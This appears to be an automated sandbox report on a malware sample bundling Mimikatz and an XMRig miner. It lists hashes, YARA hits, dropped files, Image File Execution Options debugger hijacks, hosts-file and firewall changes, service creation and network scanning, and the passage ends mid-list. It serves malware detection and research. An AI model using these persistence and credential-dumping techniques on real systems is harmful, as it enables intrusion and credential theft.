Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
15-09-2024 00:29
Behavioral task
behavioral1
Sample
2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe
-
Size
8.8MB
-
MD5
249746a2d105e2c7689fb7a1dc7fb413
-
SHA1
d939e507a070ff62f835492ff6e99f6d7e932dca
-
SHA256
2efa31b4cf790735f62039957d9d7e88958b6e66eea7e9760f45b218e7d7d446
-
SHA512
e0e6d786fc511d0c5ae756441f7bb626bc12995290fbe0478062d8bdccf0bdfcd7677e25dffca9638818de47ad70a412b66c1bfd6d489cbded92a5a482a7c5ae
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4940 created 2136 4940 bbhcwec.exe 38 -
Contacts a large (20234) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/312-182-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp xmrig behavioral2/memory/312-186-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp xmrig behavioral2/memory/312-203-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp xmrig behavioral2/memory/312-216-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp xmrig behavioral2/memory/312-225-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp xmrig behavioral2/memory/312-234-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp xmrig behavioral2/memory/312-248-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp xmrig behavioral2/memory/312-254-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp xmrig behavioral2/memory/312-255-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp xmrig behavioral2/memory/312-256-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/1884-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1884-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x00070000000234d9-6.dat mimikatz behavioral2/memory/1552-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2532-138-0x00007FF730BB0000-0x00007FF730C9E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts bbhcwec.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts bbhcwec.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe bbhcwec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbhcwec.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1300 netsh.exe 3296 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 1552 bbhcwec.exe 4940 bbhcwec.exe 4716 wpcap.exe 3160 cgpziiqcb.exe 2532 vfshost.exe 3720 bculvvitc.exe 3616 xohudmc.exe 4932 kcyycg.exe 3288 bbhcwec.exe 312 zcppya.exe 512 bculvvitc.exe 4896 bculvvitc.exe 4868 bculvvitc.exe 4880 bculvvitc.exe 3676 bculvvitc.exe 2572 bculvvitc.exe 1076 bculvvitc.exe 2920 bculvvitc.exe 1384 bculvvitc.exe 1500 bculvvitc.exe 4300 bculvvitc.exe 1608 bculvvitc.exe 4008 bculvvitc.exe 4232 bculvvitc.exe 2168 bculvvitc.exe 4392 bculvvitc.exe 412 bbhcwec.exe 764 zzahwermh.exe -
Loads dropped DLL 12 IoCs
pid Process 4716 wpcap.exe 4716 wpcap.exe 4716 wpcap.exe 4716 wpcap.exe 4716 wpcap.exe 4716 wpcap.exe 4716 wpcap.exe 4716 wpcap.exe 4716 wpcap.exe 3160 cgpziiqcb.exe 3160 cgpziiqcb.exe 3160 cgpziiqcb.exe -
resource yara_rule behavioral2/files/0x0007000000023528-134.dat upx behavioral2/memory/2532-135-0x00007FF730BB0000-0x00007FF730C9E000-memory.dmp upx behavioral2/memory/2532-138-0x00007FF730BB0000-0x00007FF730C9E000-memory.dmp upx behavioral2/files/0x0007000000023530-141.dat upx behavioral2/memory/3720-142-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/3720-157-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/files/0x0007000000023532-166.dat upx behavioral2/memory/312-169-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp upx behavioral2/memory/512-175-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/4896-179-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/312-182-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp upx behavioral2/memory/4868-184-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/312-186-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp upx behavioral2/memory/4880-189-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/3676-193-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/2572-197-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/1076-201-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/312-203-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp upx behavioral2/memory/2920-206-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/1384-210-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/1500-214-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/312-216-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp upx behavioral2/memory/4300-219-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/1608-223-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/312-225-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp upx behavioral2/memory/4008-228-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/4232-231-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/2168-233-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/312-234-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp upx behavioral2/memory/4392-236-0x00007FF6C2110000-0x00007FF6C216B000-memory.dmp upx behavioral2/memory/312-248-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp upx behavioral2/memory/312-254-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp upx behavioral2/memory/312-255-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp upx behavioral2/memory/312-256-0x00007FF71EB40000-0x00007FF71EC60000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67 ifconfig.me 68 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 bbhcwec.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft bbhcwec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content bbhcwec.exe File opened for modification C:\Windows\SysWOW64\kcyycg.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 bbhcwec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache bbhcwec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 bbhcwec.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE bbhcwec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE bbhcwec.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE bbhcwec.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData bbhcwec.exe File created C:\Windows\SysWOW64\kcyycg.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies bbhcwec.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\nlmyhmmcu\UnattendGC\specials\tucl-1.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\zlib1.dll bbhcwec.exe File created C:\Windows\rgmymecw\spoolsrv.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\scan.bat bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\crli-0.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\libeay32.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\tibe-2.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\spoolsrv.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\AppCapture32.dll bbhcwec.exe File opened for modification C:\Windows\rgmymecw\bbhcwec.exe 2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\wpcap.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\exma-1.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\vimpcsvc.xml bbhcwec.exe File opened for modification C:\Windows\rgmymecw\schoedcl.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\ssleay32.dll bbhcwec.exe File created C:\Windows\rgmymecw\vimpcsvc.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\Packet.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\zzahwermh.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\cnli-1.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\coli-0.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\posh-0.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\spoolsrv.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\schoedcl.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\schoedcl.xml bbhcwec.exe File opened for modification C:\Windows\rgmymecw\spoolsrv.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\Corporate\mimilib.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\svschost.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\spoolsrv.exe bbhcwec.exe File opened for modification C:\Windows\rgmymecw\vimpcsvc.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\Shellcode.ini bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\vimpcsvc.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\docmicfg.xml bbhcwec.exe File created C:\Windows\rgmymecw\docmicfg.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\libxml2.dll bbhcwec.exe File created C:\Windows\ime\bbhcwec.exe bbhcwec.exe File opened for modification C:\Windows\nlmyhmmcu\ycmckpemz\Packet.dll bbhcwec.exe File created C:\Windows\rgmymecw\svschost.xml bbhcwec.exe File opened for modification C:\Windows\nlmyhmmcu\ycmckpemz\Result.txt zzahwermh.exe File created C:\Windows\rgmymecw\bbhcwec.exe 2024-09-15_249746a2d105e2c7689fb7a1dc7fb413_hacktools_icedid_mimikatz.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\vimpcsvc.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\schoedcl.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\svschost.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\xdvl-0.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\docmicfg.xml bbhcwec.exe File created C:\Windows\rgmymecw\schoedcl.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\wpcap.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\cgpziiqcb.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\trfo-2.dll bbhcwec.exe File opened for modification C:\Windows\nlmyhmmcu\Corporate\log.txt cmd.exe File opened for modification C:\Windows\rgmymecw\svschost.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\upbdrjv\swrpwe.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\ucl.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\AppCapture64.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\trch-1.dll bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\specials\docmicfg.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\UnattendGC\svschost.xml bbhcwec.exe File opened for modification C:\Windows\rgmymecw\docmicfg.xml bbhcwec.exe File created C:\Windows\nlmyhmmcu\Corporate\vfshost.exe bbhcwec.exe File created C:\Windows\nlmyhmmcu\Corporate\mimidrv.sys bbhcwec.exe File created C:\Windows\nlmyhmmcu\ycmckpemz\ip.txt bbhcwec.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2028 sc.exe 4000 sc.exe 4572 sc.exe 2920 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bbhcwec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 